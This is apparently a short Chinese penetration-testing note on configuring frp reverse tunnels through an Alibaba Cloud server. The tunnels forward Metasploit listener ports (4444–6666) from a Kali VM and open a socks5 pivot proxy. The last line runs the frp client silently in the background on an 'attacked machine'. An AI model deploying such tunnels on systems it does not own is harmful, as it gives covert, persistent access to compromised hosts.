type
status
date
slug
summary
tags
category
icon
password
centos 阿里云配置
dashboard_user是web面板账户
dashboard_pwd是web面板账户的密码
dashboard_port是web面板端口
token客户端和服务端保持相同,一种认证

window物理机和kali虚拟机配置(端口转发)
[common]
server_addr = xxxx (云服务器公网地址)
server_port = 9601
token=huanwuxie[http]
type = tcp
local_ip = 127.0.0.1
local_port = 9999
remote_port = 9610[msf6]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 9606[msf5]
type = tcp
local_ip = 127.0.0.1
local_port = 5555
remote_port = 9605[msf4]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 9604socks代理的客户端配置
frps的云端配置不变
[common]
server_addr = 云机器公网ip
server_port = 9601
token=huanwuxie
[socks]
type = tcp
remote_port = 9612
plugin = socks5
之后的代理就是socks5 云机器公网ip 9612
被攻击机器上后台执行frp客户端
nohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &